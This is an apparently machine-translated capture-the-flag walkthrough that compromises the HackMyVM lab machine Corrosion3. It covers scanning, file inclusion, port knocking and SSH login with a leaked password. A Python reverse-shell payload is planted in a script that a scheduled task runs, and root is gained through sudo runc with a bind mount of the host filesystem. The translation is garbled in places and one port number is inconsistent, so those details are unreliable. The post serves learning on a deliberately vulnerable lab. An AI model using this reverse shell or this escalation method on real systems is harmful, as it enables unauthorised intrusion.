Penetration test exercise No.45 HackMyVm Worrosion3

Posted by Fluoresce on Tue, 01 Mar 2022 13:43:05 +0100

Target information

Download address:

Range: hackmyvm eu

Target name: Worrosion3

Difficulty: simple

Release time: February 18, 2022



Target: 2 flag s

Experimental environment

Attack aircraft:VMware	kali

Target plane:Vbox		linux	IP Automatic acquisition

information gathering

Scan host

Scan the IP address of the target in the LAN

sudo nmap -sP

The scanned host address is

Scan port

Open service port of scanning target

sudo nmap -sC -sV -p- -oN corrosion3.nmap

Scan to port 22 and port 80, of which port 22 is filtered. First look at port 80

After opening, it is the default page of Apache 2. First do a directory scan

gobuster dir -w ../../Dict/SecLists-2021.4/Discovery/Web-Content/directory-list-2.3-medium.txt -u -x php,html,txt,zip

Scan to the website directory and visit it

After opening, it is an html5 website. It is found in the source code that it is a TEMPLATE STOCK program. exploitdb did not find the vulnerability, so do a directory scan on the website again

gobuster dir -w ../../Dict/SecLists-2021.4/Discovery/Web-Content/directory-list-2.3-medium.txt -u -x php,html,txt,zip

logs directory is found. Please visit it

Find 2 login logs and download them to see the content


Download it and open it

cat login_request1.log

cat login_request.log

Get two groups of account passwords from two logs and try to log in with post


Page not found, sales found in directory scan_ detail. PHP page, visit and have a look

After opening, there is a blank page. I guess it needs fuzzy test,

wfuzz -c -w ../../Dict/myfuzz/dirtop20000.txt -u |grep -v '0 Ch'

After various dictionary matching parameters, the parameter shared is finally exposed (the file contains vulnerabilities). Let's take a look at the contents of the passwd file first


I found randy and bob. I saw that port 22 is filtered by firewall before. I guess Port knocking technology is needed. Let's see if we can read the configuration file


The order of knocking ports is 1110, 2220 and 333 to verify

knock 1110 2220 3330 -v

Check whether the lower port is open

sudo nmap -p 22

The port is opened, and now SSH is connected. Use the two groups of users obtained before, one of which is the same as the user name in passwd to verify whether the password is correct

ssh randy@
 Input password RaNDY$SuPer!Secr3etPa$$word

SSH login succeeded. Find the sensitive information

cd /home/bob/
cat user.txt

Get user Txt, and then look for the right raising information. If you can't find it, upload an auxiliary right raising script and check it

1. Open HTTP service in kali attacker script directory

python3 -m http.server

2. Target download auxiliary lifting script

cd /tmp
chmod +x

Find a python script of bob user. Go and have a look

cd /opt
ls -al

The script is very simple. Input, url coding, output, and then upload a pspy64 to see if it will run automatically

chmod+x pspy64

It is found that bob(UID=1001) is executed every 2 minutes. Let's modify this script to make him rebound the shell with bob permission

1. kali attacker listens to port 4444

nc -lvvp 4444

2. Modify simpleurlencode Py script


import urllib.parse

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);

string = input("Url Encode String: ")
input = urllib.parse.quote(string)
print("Encoded String: " + input)

After modification, wait for the shell to bounce back to the attacker within 2 minutes

If the rebound is successful, switch to the interactive shell first

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo;fg

After the switch is completed, find the right raising information

sudo -l

The runc program can be executed with root permission, and the root directory of the host can be mounted by running the image with runc

RunC rights

Brief introduction:

RunC is a lightweight tool. It is used to run containers. It is only used to do this, and it should be done well.
We can think of it as a command-line gadget, which can directly run the container without using the docker engine.
In fact, runC is the product of standardization, which creates and runs containers according to OCI standards.
OCI(Open Container Initiative) aims to develop an open industrial standard around container format and runtime

1. Create container root file system

mkdir bundle

2. Create root directory

cd bundle
mkdir rootfs

3. Use the spec command of runc to create the default configuration file config json

runc spec

4. Modify config JSON, add the mount directory under mount

vi config.json
	"type": "bind",
	"source": "/",
	"destination": "/",
	"options": [ "rbind", "rw", "rprivate" ]

When you're ready, you can raise your rights

sudo runc run bundle

Find flag

cd /root
cat root.txt

Get root Txt, the game is over

Buddy love is the end of this article. The little WeChat partners who like shooting can pay attention to the official account of "volkway school safety" or scan the following two-dimensional code. I will keep updating the shooting articles, let's learn progress together in shooting.

Topics: Cyber Security penetration test